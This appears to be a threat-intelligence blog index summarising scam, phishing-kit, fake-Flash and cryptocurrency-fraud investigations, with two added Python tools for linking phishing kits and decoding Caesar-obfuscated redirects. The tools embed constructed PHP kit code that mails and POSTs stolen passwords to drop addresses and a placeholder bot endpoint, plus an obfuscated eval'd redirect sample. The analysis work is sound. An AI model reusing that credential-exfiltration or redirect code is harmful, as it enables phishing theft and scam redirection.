Interesting Crawls

Analyst Interesting Crawls

Not so Fast – Some Online Scams Don’t Take No for an Answer

Some online scams literally don't take no for an answer.

Beyond tricking users with flashy ads for fake products or prizes, or scaring them into downloading phony software in order to redirect them elsewhere, some scammers go a step further: they don't even let their victims leave the page.

While doing page reviews for RiskIQ's scam model, I came across an interesting crawl. Because it was missing a screenshot and, strangely, there seemed to be a phone number in the URL's query string, I decided to take a closer look.

hxxps://d7wbuen63chon.cloudfront[dot]net/new/index.html?phone=+1-855-500-0184#forward

Fig-1 PDF download prompt

Analyst Interesting Crawls

Phone Scam Uses Scammy App That Infects Phones for Ad-clicking and Info-Stealing Controls Over 60,000 Devices

Also by Aaron Inness

At RiskIQ, we observe thousands of scam web pages in all forms, everything from fake pharmaceutical ads to phony prizes to spurious tech support, and label them accordingly. In the mobile ecosystem, popular scams include 'your device is running low!', 'you need to update your device!' or 'you need to install this antivirus to save your device!' In today's post, we'll take a look at one of these scams that surfaced in our crawl data.

Although the app these scam pages send users to does perform its advertised function, it also has a nasty secret: it infects victims' devices and comes with a side of information stealing and ad-clicking.

Cleanup required!

Many of the millions of scams we crawl at RiskIQ are relatively straightforward, but every once in a while we find something unique. Usually, scams point to other web pages, but in this case we noticed one that redirects victims who click through to Google Play, where they are served a malicious app. To get to the bottom of how the scam works from beginning to end, we pointed our investigative resources at it and outlined our findings below.

Analyst Interesting Crawls

Linking Infrastructure from Phishing Data Exfiltrations

Phishing is still one of the most relentless and quickly evolving online threats facing today's businesses.

At RiskIQ, we process tons of web-related threat data, including phishing incidents. From various sources, we receive URLs which may be indicative of phishing, examine the pages with our web-crawling infrastructure, which experiences them as a real user would, and feed the data it collects through our machine-learning technology to classify each detected phishing page appropriately.

Phishing pages' infrastructure usually takes one of two forms: custom infrastructure the actor maintains themselves, or abused or compromised infrastructure belonging to someone else. Below is an instance of the latter, an email phishing page hosted on someone else's infrastructure. It's somewhat generic, but an excellent example of the kind of page commonly leveled against businesses:


Fig-1 Phishing page
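Before looking at other instances of the kit, an added example of the pivot the title refers to: the exfiltration endpoints baked into a kit are what let an analyst link otherwise unrelated phishing pages to the same operator. This is illustrative code, not RiskIQ's tooling and not the source of the kit in the figure. It assumes the common structure of PHP phishing kits, where harvested form fields are forwarded by mail() to a hard-coded drop address or POSTed by curl to a collection URL; the kit files, paths, drop addresses and URLs below are constructed for the example, and api.telegram.example is a placeholder hostname.

```python
import re
from collections import defaultdict

# Constructed kit sources, standing in for the PHP "send" scripts an analyst
# unpacks from kit archives left on compromised hosts. Paths, drop addresses
# and URLs are invented; api.telegram.example is a placeholder, not a real host.
KITS = {
    "kit-a/send.php": r"""<?php
$to = "drop.one@example.net";
$msg = "Email: " . $_POST['email'] . " Pass: " . $_POST['pass'];
mail($to, "New Login", $msg, "From: result@" . $_SERVER['SERVER_NAME']);
header("Location: https://mail.example.org/");
?>""",
    "kit-b/post.php": r"""<?php
$recipient = 'drop.one@example.net';
$data = "User: " . $_POST['user'] . " | Pw: " . $_POST['pw'] . " | IP: " . $_SERVER['REMOTE_ADDR'];
mail($recipient, "Result", $data);
$ch = curl_init("https://api.telegram.example/bot123456:TOKEN/sendMessage");
curl_setopt($ch, CURLOPT_POSTFIELDS, "chat_id=987&text=" . urlencode($data));
curl_exec($ch);
?>""",
    "kit-c/login.php": r"""<?php
$sendto = "other.drop@example.com";
mail($sendto, "Office", $_POST['email'] . " : " . $_POST['password']);
?>""",
}

EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")
URL_RE = re.compile(r"https?://[^\s'\"()]+")
# Outbound calls whose first string argument is a collection endpoint.
OUTBOUND_RE = re.compile(r"(curl_init|file_get_contents|fopen)\s*\(\s*['\"]([^'\"]+)['\"]")


def exfil_destinations(src):
    """Return the set of exfiltration endpoints in one kit file: every
    e-mail address literal plus every URL an outbound call is pointed at.
    Redirect targets in header() are deliberately not collected, because
    they point at the impersonated brand, not at the attacker."""
    dests = set(EMAIL_RE.findall(src))
    for m in OUTBOUND_RE.finditer(src):
        url = m.group(2)
        if URL_RE.match(url):
            dests.add(url)
    return dests


def link_kits(kits):
    """Invert the relation: destination -> sorted list of kit files using it."""
    index = defaultdict(set)
    for path, src in kits.items():
        for dest in exfil_destinations(src):
            index[dest].add(path)
    return {dest: sorted(paths) for dest, paths in index.items()}


def shared_infrastructure(kits):
    """Destinations seen in more than one kit: the pivots worth chasing,
    since a shared drop address ties separate pages to one operator."""
    return {d: p for d, p in link_kits(kits).items() if len(p) > 1}


if __name__ == "__main__":
    for dest, paths in shared_infrastructure(KITS).items():
        print(dest, "<-", ", ".join(paths))
```

Run over real kit archives, the same inversion turns a pile of unrelated-looking phishing URLs into clusters keyed on a drop mailbox or bot endpoint, which is the artifact to search for when hunting further instances.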

Looking through some sources online, I dug up some additional instances of this phishing kit:

Labs Interesting Crawls

This is How Threat Actors Overwhelm the Defenses of Ad Networks

Also by Ian Cowger

Traffic is a vital commodity in the cybercrime ecosystem that enables criminals to monetize their campaigns in various ways, whether by hijacking traffic from ad networks, carrying out phishing attacks, distributing malware to vulnerable computers, or sending victims to far-reaching networks of scam sites.  

Many attackers protect this source of revenue by using traffic and device filtering techniques to block out security researchers and optimize the type of traffic they get. In this post, we'll examine a tactic we see more and more in the wild: obfuscated code on pages that redirect users to malicious pages. We'll also take a look at why scam networks that burn through huge swathes of cheap, disposable infrastructure are a destination of choice for traffic captured by these campaigns.

The redirector below, which we call CaesarV because it uses a Caesar cipher to obfuscate the code on its pages that performs the redirection, is in this case sending traffic to what RiskIQ's models identified as fake tech support pages.
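As an added example, and not CaesarV's actual code or RiskIQ's tooling, here is a small Python deobfuscator of the kind an analyst would run over crawl data to recover the redirect target from a Caesar-shifted payload. The embedded page is constructed for the example: the payload is shifted by 3 over ASCII letters only and decoded by an inline loop before being passed to eval. CaesarV's real shift, string format and hostnames are not reproduced, and decoy-support.example is a placeholder. Because the shift is unknown up front, the decoder tries all 25 non-trivial shifts and keeps the one that yields redirect-looking JavaScript.

```python
import re

# Constructed sample page: "window.location.href='http://decoy-support.example/'"
# shifted by +3 over a-z, then undone in the browser by a shift of +23 (i.e. -3)
# and passed to eval. Not CaesarV's real code; the hostname is a placeholder.
SAMPLE_PAGE = """<html><body><script>
var p = "zlqgrz.orfdwlrq.kuhi='kwws://ghfrb-vxssruw.hadpsoh/'";
var o = ""; for (var i = 0; i < p.length; i++) {
  var c = p.charCodeAt(i);
  if (c >= 97 && c <= 122) c = (c - 97 + 23) % 26 + 97;
  o += String.fromCharCode(c); }
eval(o);
</script></body></html>"""

# Substrings whose presence after a candidate shift indicates we hit plaintext.
REDIRECT_MARKERS = ("window.location", "document.location", "location.href",
                    "location.replace", "http://", "https://")
URL_RE = re.compile(r"https?://[A-Za-z0-9._~:/?#\[\]@!$&'()*+,;=%-]+")


def caesar_shift(text, shift):
    """Shift ASCII letters by `shift` positions (wrapping); leave digits,
    punctuation and non-ASCII untouched, which is how these loops behave."""
    out = []
    for ch in text:
        if "a" <= ch <= "z":
            out.append(chr((ord(ch) - 97 + shift) % 26 + 97))
        elif "A" <= ch <= "Z":
            out.append(chr((ord(ch) - 65 + shift) % 26 + 65))
        else:
            out.append(ch)
    return "".join(out)


def score(candidate):
    """Count redirect markers; higher means more likely to be the plaintext."""
    return sum(candidate.count(m) for m in REDIRECT_MARKERS)


def find_encoded_strings(html):
    """Pull candidate payloads: double-quoted literals of 16+ characters
    inside <script> blocks. Short literals are skipped to cut noise."""
    literals = []
    for body in re.findall(r"<script[^>]*>(.*?)</script>", html, re.S | re.I):
        literals += re.findall(r'"([^"\n]{16,})"', body)
    return literals


def deobfuscate(blob):
    """Try every non-trivial shift and return (shift, plaintext) for the one
    with the best marker score. Shift 0 with a zero score means no shift
    produced anything redirect-like."""
    best_shift, best_text, best_score = 0, blob, score(blob)
    for k in range(1, 26):
        cand = caesar_shift(blob, k)
        sc = score(cand)
        if sc > best_score:
            best_shift, best_text, best_score = k, cand, sc
    return best_shift, best_text


def extract_redirects(html):
    """Return [(shift, decoded_js, [urls])] for each literal that decodes to
    redirect-looking code; literals that never do are dropped."""
    results = []
    for lit in find_encoded_strings(html):
        shift, plain = deobfuscate(lit)
        if score(plain) == 0:
            continue
        urls = [u.rstrip("'\"") for u in URL_RE.findall(plain)]
        results.append((shift, plain, urls))
    return results


if __name__ == "__main__":
    for shift, js, urls in extract_redirects(SAMPLE_PAGE):
        print(f"shift={shift}  js={js!r}  urls={urls}")
```

The recovered shift for the sample is 23, the same value the page's own decode loop applies, and the URL list is what an analyst would feed back into crawl infrastructure to follow the redirect chain. The marker list is the knob to tune: a redirector that builds its destination with string concatenation or uses meta refresh will need markers of its own.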

Where does this traffic come from?

Labs Analyst Interesting Crawls

SpeedFlash and ScrnSize: Fake Flash Updates with a Side of Domain Shadowing

Fake Flash download pages have come to be a marker for all manner of malicious activity. We've seen them in conjunction with exploit kits, banking Trojans, watering hole attacks, malvertising, adware, phishing, digital currency miners, and multitudes of other digital threats. Often, there are traffic distribution systems or other means of traffic filtering upstream of these sites, and many campaigns use decoy sites to which they dump unwanted traffic rather than serving up the malicious payload.

Today, we’ll be looking at a redirection sequence that brings many of these malicious tactics together, showing evidence of a campaign that uses fingerprinting and filtering, domain infringement, domain shadowing, indicators of cookie tracking, and malicious downloads using fake Flash. From one redirect, we were able to uncover thousands of artifacts pointing to a more extensive malicious campaign preying on potentially thousands of victims.

Digging In

Below is a typical redirection sequence from this particular malicious campaign leading from an initial fingerprinting and redirection page to a page serving fake Flash to a “speed test” decoy page:

Fig-1 Sequence leading from a fingerprinting page to a page serving fake Flash, which redirects to a speed test decoy page.

Labs Interesting Crawls

Networks of Scammy Cryptocurrency Sites Promise Payday that Never Comes

With cryptocurrency mania in full swing, investors must now navigate an entirely new, rapidly expanding threat landscape. Coins, alt-coins, tokens, exchanges, and other cryptocurrency apps—both legitimate and malicious—pop up in the marketplace every day, many of which leverage the massive popularity and 'get-rich-quick' promise of cryptocurrency to attract new users. Some of these apps are stood up to target users, while many become the target of hackers themselves.

The cryptocurrency threat campaigns RiskIQ observes show that threat actors bank on the fact that, to many people, the concept of cryptocurrency is nebulous at best, yet still seen as a viable way to make money. This widespread perception creates fertile ground for scammers, who take advantage by creating all manner of cryptocurrency fakery designed to fool people out of money. Already, RiskIQ has detected and blacklisted dozens of fake cryptocurrency apps in the mobile app ecosystem that exploit the names of well-known exchanges and mixers, as well as hundreds of sites that falsely promise to make users money in other ways.

The site cryptcoins.biz, for example, has a glossy crypto veneer but resembles a common advance fee scheme. Users can purchase phony "coins," marketed as various "cryptocurrencies" with real money (rubles) via Payeer, with the goal of being able to exchange them for a return on investment later. They can also earn them through "bonuses" rewarded for taking actions such as clicking on ads, visiting web pages, and recruiting new users.

However, the exchange rates for these coins to rubles are intentionally confusing and absurdly steep. To receive a payout via Payeer, users must first exchange their coins for "silver," which they then exchange for rubles at a rate of 100 "coins" to 1 "silver," and 100 "silver" to 1 ruble. This rate makes for a fantastic deal for the people who run the site, but it's a shakedown for customers.

Fig-1 Phony coins named after actual cryptocurrencies promising investors a profit
